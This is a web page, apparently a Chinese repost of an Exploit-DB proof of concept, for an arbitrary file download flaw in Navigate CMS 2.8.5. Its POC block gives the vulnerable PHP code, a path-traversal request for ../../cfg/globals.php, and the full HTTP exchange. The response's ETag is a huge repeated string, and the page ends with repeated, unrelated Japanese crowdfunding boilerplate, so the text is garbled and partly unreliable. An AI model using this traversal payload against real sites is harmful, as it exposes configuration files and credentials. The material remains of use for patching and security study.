Navigate CMS 2.8.5 Arbitrary File Download Vulnerability POC

漏洞概述 漏洞名称: Navigate CMS 2.8.5 - 任意文件下载 EDB-ID: 45615 作者: Ihsan Sencan 类型: Webapps 平台: PHP 日期: 2018-10-16 验证状态: 已验证 影响范围 受影响软件: Navigate CMS 2.8.5 漏洞描述: 用户可以使用任意文件下载功能下载任意文件。 测试环境: Win7_x64/KaliLinux_x64 修复方案 建议: 更新Navigate CMS到最新版本，或采取其他安全措施防止任意文件下载漏洞。 POC代码 ```php Exploit Title: Navigate CMS 2.8.5 - Arbitrary File Download Dork: N/A Date: 2018-10-13 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.navigatecms.com/ Software Link: http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8.5r1355.zip Version: 2.8.5 Category: Webapps Tested on: Win7_x64/KaliLinux_x64 CVE: N/A POC: 1) Description Profile type users+ can download arbitrary files. http://TARGET/[PATH]/navigate_download.php?wid=&id=[FILE] / 'exploitdb_' . 'nv_profiles' / $nv_profiles = array( array('id' => '1','name' => 'Administrator','description' => '','menus' => ['2','3','4','6','1']), array('id' => '2','name' => 'User','description' => 'Default Navigate CMS user profile','menus' => ['2','3','7']) ); navigate_download.php ........ $id = $_REQUEST['id']; if(empty($_REQUEST['id'])) { if(is_int($id)) $item->load($id); else $item->load($_REQUEST['id']); } if(!$item->id) { echo 'Error: no item found with id ' . $_REQUEST['id'] . '.'; session_write_close(); $DB->disconnect(); // we don't need the database anymore (we'll see) exit; } $website = new Website(); if(empty($_GET['wid'])) ........ http://TARGET/[PATH]/navigate_download.php?wid=&id=../../cfg/globals.php GET /[PATH]/navigate_download.php?wid=&id=../../cfg/globals.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bklqak7o03; NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; navigate-tinyce-scroll=47B7D0 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 13 Oct 2018 13:36:12 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; path=/ Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET Set-Cookie: PHPSESSID=43c3fe79r969u85bklqak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET Expires: Sat, 20 Oct 2018 12:36:12 GMT Cache-Control: private Pragma: cache ETag: "L14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14vL14

目標達成すべての支援者に感謝 — 100%達成しました！

Navigate CMS 2.8.5 Arbitrary File Download Vulnerability POC

このソースからの他の記事

目標達成 すべての支援者に感謝 — 100%達成しました！

Navigate CMS 2.8.5 Arbitrary File Download Vulnerability POC

このソースからの他の記事

目標達成すべての支援者に感謝 — 100%達成しました！